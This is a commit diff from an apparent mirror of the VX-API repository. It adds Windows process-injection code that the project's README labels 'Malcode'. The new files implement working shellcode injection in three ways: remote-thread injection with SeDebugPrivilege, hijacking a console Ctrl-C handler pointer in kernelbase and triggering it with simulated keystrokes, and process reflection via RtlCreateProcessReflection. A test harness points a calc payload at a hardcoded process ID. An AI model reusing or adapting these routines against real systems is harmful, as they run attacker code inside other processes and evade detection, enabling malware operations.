mirror of https://github.com/vxunderground/VX-API
parent
1e198d4dd8
commit
bd5aba026d
|
@ -0,0 +1,61 @@
|
|||
#include <Windows.h>
|
||||
#include <stdio.h>
|
||||
|
||||
BOOL PrintBanner(VOID)
|
||||
{
|
||||
|
||||
puts("");
|
||||
puts(" vx-underground.org Process Injection Testing Application (PITA)");
|
||||
puts("");
|
||||
puts("\t8b d8 8b d8 88 88 ,ad8888ba, ");
|
||||
puts("\t`8b d8' Y8, ,8P 88 88 d8\"' `\"8b ");
|
||||
puts("\t `8b d8' `8b d8' 88 88 d8' ");
|
||||
puts("\t `8b d8' Y88P 88 88 88 ");
|
||||
puts("\t `8b d8' d88b 88 88 88 88888 ");
|
||||
puts("\t `8b d8' ,8P Y8, 88 88 Y8, 88 ");
|
||||
puts("\t `888' d8' `8b Y8a. . a8P Y8a. a88 ");
|
||||
puts("\t `8' 8P Y8 `\"Y8888Y\"' `\"Y88888P\"");
|
||||
puts("");
|
||||
|
||||
puts(" Built for process injection testing && based on the research conducted by SafeBreach Labs");
|
||||
puts("");
|
||||
puts("");
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
DWORD WndProcCallbackRoutine(_In_ LPVOID lpParameter)
|
||||
{
|
||||
MSG Msg;
|
||||
BOOL bRet;
|
||||
|
||||
printf("Message loop Thread ID = %ld\r\n", GetCurrentThreadId());
|
||||
while ((bRet = GetMessage(&Msg, NULL, 0, 0)) != 0)
|
||||
{
|
||||
if (bRet == -1)
|
||||
return GetLastError();
|
||||
|
||||
TranslateMessage(&Msg);
|
||||
DispatchMessageW(&Msg);
|
||||
}
|
||||
|
||||
return (DWORD)Msg.wParam;
|
||||
}
|
||||
|
||||
INT main(VOID)
|
||||
{
|
||||
HANDLE hThread = NULL;
|
||||
PrintBanner();
|
||||
|
||||
hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)WndProcCallbackRoutine, NULL, 0, NULL);
|
||||
if (hThread == NULL)
|
||||
return GetLastError();
|
||||
|
||||
while (TRUE)
|
||||
{
|
||||
printf("Process ID = %ld, Thread ID = %ld -- Application is in an alertable state\r\n", GetCurrentProcessId(), GetCurrentThreadId());
|
||||
SleepEx(10000, TRUE);
|
||||
}
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
|
@ -0,0 +1,135 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<ProjectGuid>{fbf1308a-94f4-4bec-b2b3-d30a19bddb4a}</ProjectGuid>
|
||||
<RootNamespace>ProcessInjectionTestingApplications</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v143</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v143</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v143</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v143</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="Main.cpp" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,22 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Resource Files">
|
||||
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="Main.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
</Project>
|
|
@ -0,0 +1,4 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup />
|
||||
</Project>
|
12
README.md
12
README.md
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.488
|
||||
Version: 2.0.505
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -42,6 +42,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| StringToken | Apple (c) 1999 | String Manipulation |
|
||||
| ZeroMemoryEx | ReactOS | String Manipulation |
|
||||
| ConvertCharacterStringToIntegerUsingNtdll | smelly__vx | String Manipulation |
|
||||
| MemoryFindMemory | KamilCuk | String Manipulation |
|
||||
| AdfCloseHandleOnInvalidAddress | Checkpoint Research | Anti-debug |
|
||||
| AdfIsCreateProcessDebugEventCodeSet | Checkpoint Research | Anti-debug |
|
||||
| AdfOpenProcessOnCsrss | Checkpoint Research | Anti-debug |
|
||||
|
@ -156,6 +157,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| MpfGetLsaPidFromRegistry | modexp | Malcode |
|
||||
| MpfGetLsaPidFromNamedPipe | modexp | Malcode |
|
||||
| ShellcodeExecutionViaFunctionCallbackMain | alfarom256, aahmad097| Malcode |
|
||||
| ProcessInjectionMain | SafeBreach Labs | Malcode |
|
||||
| MpfComMonitorChromeSessionOnce | smelly__vx | Malcode |
|
||||
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 | Malcode |
|
||||
| MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey | Malcode |
|
||||
|
@ -185,11 +187,3 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| IcmpSendEcho2Ex | N/A | N/A |
|
||||
| WQL Win32_Ping | Martin Friedrich | N/A |
|
||||
| Process Injection | N/A | N/A |
|
||||
|
||||
# Notes
|
||||
| Function Name | Note | Fixed |
|
||||
| ------------- | ---- | ----- |
|
||||
| StringToken | Needs revision, buggy | N/A |
|
||||
| NtQueryOpenSubKeysEx | admin required | N/A |
|
||||
| ManualResourceDataFetching by Orca | Review and complete | N/A |
|
||||
| MpfComMonitorChromeSessionOnce | Usability improvements needed | N/A |
|
||||
|
|
10
VX-API.sln
10
VX-API.sln
|
@ -5,6 +5,8 @@ VisualStudioVersion = 17.3.32811.315
|
|||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "VX-API", "VX-API\VX-API.vcxproj", "{12CF8029-1663-470E-B138-39DC69C35B1D}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Process Injection Testing Applications", "Process Injection Testing Applications\Process Injection Testing Applications.vcxproj", "{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|x64 = Debug|x64
|
||||
|
@ -21,6 +23,14 @@ Global
|
|||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x64.Build.0 = Release|x64
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x86.ActiveCfg = Release|Win32
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x86.Build.0 = Release|Win32
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Debug|x64.Build.0 = Debug|x64
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Debug|x86.ActiveCfg = Debug|Win32
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Debug|x86.Build.0 = Debug|Win32
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Release|x64.ActiveCfg = Release|x64
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Release|x64.Build.0 = Release|x64
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Release|x86.ActiveCfg = Release|Win32
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Release|x86.Build.0 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
|
|
|
@ -37,6 +37,8 @@ typedef NTSTATUS(NTAPI* LDRREGISTERDLLNOTIFICATION)(ULONG, LDR_DLL_NOTIFICATION_
|
|||
typedef NTSTATUS(NTAPI* LDRUNREGISTERDLLNOTIFICATION)(PVOID);
|
||||
typedef NTSTATUS(NTAPI* RTLCHARTOINTEGER)(PCHAR, ULONG, PULONG);
|
||||
typedef ULONG(NTAPI* RTLUNIFORM)(PULONG);
|
||||
typedef NTSTATUS(NTAPI* RTLCREATEPROCESSREFLECTION)(HANDLE, ULONG, PVOID, PVOID, HANDLE, RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION*);
|
||||
typedef NTSTATUS(NTAPI* RTLENCODEREMOTEPOINTER)(HANDLE, PVOID, PVOID*);
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -61,6 +61,10 @@
|
|||
#define FILE_PIPE_READ_DATA 0x00000000
|
||||
#define FILE_PIPE_WRITE_SPACE 0x00000001
|
||||
|
||||
#define RTL_CLONE_PROCESS_FLAGS_CREATE_SUSPENDED 0x00000001
|
||||
#define RTL_CLONE_PROCESS_FLAGS_INHERIT_HANDLES 0x00000002
|
||||
#define RTL_CLONE_PROCESS_FLAGS_NO_SYNCHRONIZE 0x00000004
|
||||
|
||||
typedef struct _LSA_UNICODE_STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
|
||||
|
@ -1155,3 +1159,10 @@ typedef union _LDR_DLL_NOTIFICATION_DATA {
|
|||
|
||||
typedef VOID(CALLBACK* LDR_DLL_NOTIFICATION_FUNCTION)(ULONG, CONST PLDR_DLL_NOTIFICATION_DATA, PVOID);
|
||||
|
||||
typedef struct RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION
|
||||
{
|
||||
HANDLE ReflectionProcessHandle;
|
||||
HANDLE ReflectionThreadHandle;
|
||||
CLIENT_ID ReflectionClientId;
|
||||
} RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION, *PRTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION;
|
||||
|
||||
|
|
|
@ -35,8 +35,16 @@ int main(VOID)
|
|||
Sei.dwLengthOfPayloadInBytes = 277;
|
||||
Sei.MethodEnum = E_RTLUSERFIBERSTART;
|
||||
DWORD dwX = 0;
|
||||
|
||||
PROCESS_INJECTION_INFORMATION Pii = { 0 };
|
||||
|
||||
Pii.Payload = GlobalOpenCalcPayload;
|
||||
Pii.dwLengthOfPayloadInBytes = 277;
|
||||
Pii.ProcessId = 31480;
|
||||
Pii.MethodEnum = E_CTRL_INJECT;
|
||||
|
||||
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
|
||||
//ProcessInjectionMain(&Pii);
|
||||
|
||||
return dwError;
|
||||
}
|
||||
|
|
|
@ -0,0 +1,15 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
PVOID MemoryFindMemory(_In_ PVOID Haystack, _In_ SIZE_T HaystackLength, _In_ PVOID Needle, _In_ SIZE_T NeedleLength)
|
||||
{
|
||||
if (!Haystack || !HaystackLength || !Needle || !NeedleLength)
|
||||
return NULL;
|
||||
|
||||
for (PCHAR pChar = (PCHAR)Haystack; HaystackLength >= NeedleLength; ++pChar, --HaystackLength)
|
||||
{
|
||||
if (!memcmp(pChar, Needle, NeedleLength))
|
||||
return pChar;
|
||||
}
|
||||
|
||||
return NULL;
|
||||
}
|
|
@ -0,0 +1,59 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL MpfProcessInjectionViaProcessReflection(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid)
|
||||
{
|
||||
/*
|
||||
This process execution is really finnicky. I was able to get this to work
|
||||
using the proof-of-concept dubbed "DirtyVanity".
|
||||
|
||||
Link: https://github.com/deepinstinct/Dirty-Vanity
|
||||
|
||||
However, I was unable to get this to work using traditional shellcode (or PIC binaries)
|
||||
from projects such as Donut of MsfVenom. I am too lazy to modify the Shellcode supplied
|
||||
from DeepInstinct.
|
||||
|
||||
tl;dr code works, too lazy to debug to determine more accurate shellcode requirements
|
||||
|
||||
/me shrugs
|
||||
|
||||
*/
|
||||
|
||||
RTLCREATEPROCESSREFLECTION RtlCreateProcessReflection = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
HANDLE hHandle = NULL;
|
||||
LPVOID BaseAddress = NULL;
|
||||
SIZE_T DisposableObject = ERROR_SUCCESS;
|
||||
RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION Information = { 0 };
|
||||
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
if (hModule == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RtlCreateProcessReflection = (RTLCREATEPROCESSREFLECTION)GetProcAddressA((DWORD64)hModule, "RtlCreateProcessReflection");
|
||||
if (!RtlCreateProcessReflection)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE, TRUE, TargetPid);
|
||||
if (hHandle == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, dwSizeOfShellcodeInBytes, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
|
||||
if (BaseAddress == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!WriteProcessMemory(hHandle, BaseAddress, Shellcode, dwSizeOfShellcodeInBytes, &DisposableObject))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (RtlCreateProcessReflection(hHandle, RTL_CLONE_PROCESS_FLAGS_INHERIT_HANDLES | RTL_CLONE_PROCESS_FLAGS_NO_SYNCHRONIZE, BaseAddress, NULL, NULL, &Information) != STATUS_SUCCESS)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -0,0 +1,168 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
|
||||
// ---------------------------------------- EXIT ROUTINE ----------------------------------------
|
||||
//EXIT_ROUTINE_CASE_0:
|
||||
DWORD ProcessInjectionMain(_In_ PPROCESS_INJECTION_INFORMATION Pii)
|
||||
{
|
||||
DWORD dwReturn = ERROR_SUCCESS;
|
||||
HANDLE hHandle = NULL;
|
||||
LPVOID BaseAddress = NULL;
|
||||
HANDLE hThread = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
switch (Pii->MethodEnum)
|
||||
{
|
||||
case E_WRITEPROCESSMEMORY_CREATEREMOTETHREAD_EXECUTESHELLCODE:
|
||||
{
|
||||
hHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pii->ProcessId);
|
||||
if (hHandle == NULL)
|
||||
break;
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, Pii->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BaseAddress == NULL)
|
||||
break;
|
||||
|
||||
if (!SetProcessPrivilegeToken(0))
|
||||
break;
|
||||
|
||||
if (!WriteProcessMemory(hHandle, BaseAddress, Pii->Payload, Pii->dwLengthOfPayloadInBytes, NULL))
|
||||
break;
|
||||
|
||||
hThread = CreateRemoteThread(hHandle, NULL, 0, (LPTHREAD_START_ROUTINE)BaseAddress, NULL, 0, NULL);
|
||||
if (hThread == NULL)
|
||||
break;
|
||||
|
||||
WaitForSingleObject(hThread, INFINITE);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
break;
|
||||
}
|
||||
|
||||
case E_CTRL_INJECT:
|
||||
{
|
||||
DWORD ConsoleAttachList[2] = { 0 };
|
||||
DWORD ParentId = 0;
|
||||
PVOID EncodedAddress = NULL;
|
||||
INPUT Input = { 0 };
|
||||
MODULEINFO KernelbaseInformation = { 0 };
|
||||
HWND hWindow = NULL;
|
||||
HMODULE KernelBase = NULL, hModule = NULL;
|
||||
RTLENCODEREMOTEPOINTER RtlEncodeRemotePointer = NULL;
|
||||
DWORD64 Encoded = 0;
|
||||
|
||||
PCHAR KernelBaseDefaultHandler = NULL;
|
||||
PCHAR KernelBaseSingleHandler = NULL;
|
||||
|
||||
KernelBase = GetModuleHandleEx2W(L"kernelbase.dll");
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
|
||||
if (!KernelBase || !hModule)
|
||||
break;
|
||||
|
||||
RtlEncodeRemotePointer = (RTLENCODEREMOTEPOINTER)GetProcAddressA((DWORD64)hModule, "RtlEncodeRemotePointer");
|
||||
if (RtlEncodeRemotePointer == NULL)
|
||||
break;
|
||||
|
||||
if (!K32GetModuleInformation(InlineGetCurrentProcess, KernelBase, &KernelbaseInformation, sizeof(KernelbaseInformation)))
|
||||
break;
|
||||
|
||||
KernelBaseDefaultHandler = (PCHAR)MemoryFindMemory(KernelBase, KernelbaseInformation.SizeOfImage, (PVOID)"\x48\x83\xec\x28\xb9\x3a\x01\x00\xc0", 9);
|
||||
if (KernelBaseDefaultHandler == NULL)
|
||||
break;
|
||||
|
||||
Encoded = (DWORD64)EncodePointer(KernelBaseDefaultHandler);
|
||||
if (Encoded == 0)
|
||||
break;
|
||||
|
||||
KernelBaseSingleHandler = (PCHAR)MemoryFindMemory(KernelBase, KernelbaseInformation.SizeOfImage, &Encoded, 8);
|
||||
if (KernelBaseSingleHandler == NULL)
|
||||
break;
|
||||
|
||||
if (GetConsoleProcessList(ConsoleAttachList, 2) < 2)
|
||||
break;
|
||||
|
||||
if (ConsoleAttachList[0] != GetCurrentProcessIdFromTeb())
|
||||
ParentId = ConsoleAttachList[0];
|
||||
else
|
||||
ParentId = ConsoleAttachList[1];
|
||||
|
||||
FreeConsole();
|
||||
AttachConsole(Pii->ProcessId);
|
||||
|
||||
hWindow = GetConsoleWindow();
|
||||
|
||||
FreeConsole();
|
||||
AttachConsole(ParentId);
|
||||
|
||||
hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, Pii->ProcessId);
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, Pii->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BaseAddress == NULL)
|
||||
break;
|
||||
|
||||
if (!WriteProcessMemory(hHandle, BaseAddress, Pii->Payload, Pii->dwLengthOfPayloadInBytes, NULL))
|
||||
break;
|
||||
|
||||
CloseHandle(hHandle);
|
||||
|
||||
hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, Pii->ProcessId); // PROCESS_VM_OPERATION is required for RtlEncodeRemotePointer
|
||||
if (hHandle == NULL)
|
||||
break;
|
||||
|
||||
RtlEncodeRemotePointer(hHandle, BaseAddress, &EncodedAddress);
|
||||
|
||||
if (!WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL))
|
||||
break;
|
||||
|
||||
Input.type = INPUT_KEYBOARD;
|
||||
Input.ki.wScan = 0;
|
||||
Input.ki.time = 0;
|
||||
Input.ki.dwExtraInfo = 0;
|
||||
Input.ki.wVk = VK_CONTROL;
|
||||
Input.ki.dwFlags = 0; // 0 for key press
|
||||
|
||||
SendInput(1, &Input, sizeof(INPUT));
|
||||
Sleep(100);
|
||||
|
||||
PostMessageA(hWindow, WM_KEYDOWN, 'C', 0);
|
||||
|
||||
Sleep(100);
|
||||
|
||||
Input.type = INPUT_KEYBOARD;
|
||||
Input.ki.wScan = 0;
|
||||
Input.ki.time = 0;
|
||||
Input.ki.dwExtraInfo = 0;
|
||||
Input.ki.wVk = VK_CONTROL;
|
||||
Input.ki.dwFlags = KEYEVENTF_KEYUP;
|
||||
SendInput(1, &Input, sizeof(INPUT));
|
||||
|
||||
RtlEncodeRemotePointer(hHandle, KernelBaseDefaultHandler, &EncodedAddress);
|
||||
WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL);
|
||||
|
||||
bFlag = TRUE;
|
||||
break;
|
||||
}
|
||||
|
||||
default:
|
||||
break;
|
||||
}
|
||||
|
||||
if (!bFlag)
|
||||
dwReturn = GetLastErrorFromTeb();
|
||||
|
||||
if (BaseAddress)
|
||||
{
|
||||
if(hHandle)
|
||||
VirtualFreeEx(hHandle, BaseAddress, ERROR_SUCCESS, MEM_RELEASE);
|
||||
}
|
||||
|
||||
if (hThread)
|
||||
CloseHandle(hThread);
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return dwReturn;
|
||||
}
|
|
@ -15,17 +15,17 @@ BOOL SetProcessPrivilegeToken(_In_ DWORD PrivilegeEnum)
|
|||
|
||||
switch (PrivilegeEnum)
|
||||
{
|
||||
case 0:
|
||||
{
|
||||
StringCopyW(PrivilegeString, (PWCHAR)L"SeDebugPrivilege");
|
||||
break;
|
||||
}
|
||||
case 1:
|
||||
{
|
||||
StringCopyW(PrivilegeString, (PWCHAR)L"SeBackupPrivilege");
|
||||
break;
|
||||
}
|
||||
default:
|
||||
case 0:
|
||||
{
|
||||
StringCopyW(PrivilegeString, (PWCHAR)L"SeDebugPrivilege");
|
||||
break;
|
||||
}
|
||||
case 1:
|
||||
{
|
||||
StringCopyW(PrivilegeString, (PWCHAR)L"SeBackupPrivilege");
|
||||
break;
|
||||
}
|
||||
default:
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
|
|
|
@ -36,4 +36,5 @@ VOID ByteArrayToCharArrayW(_Inout_ PWCHAR Destination, _In_ PBYTE Source, _In_ D
|
|||
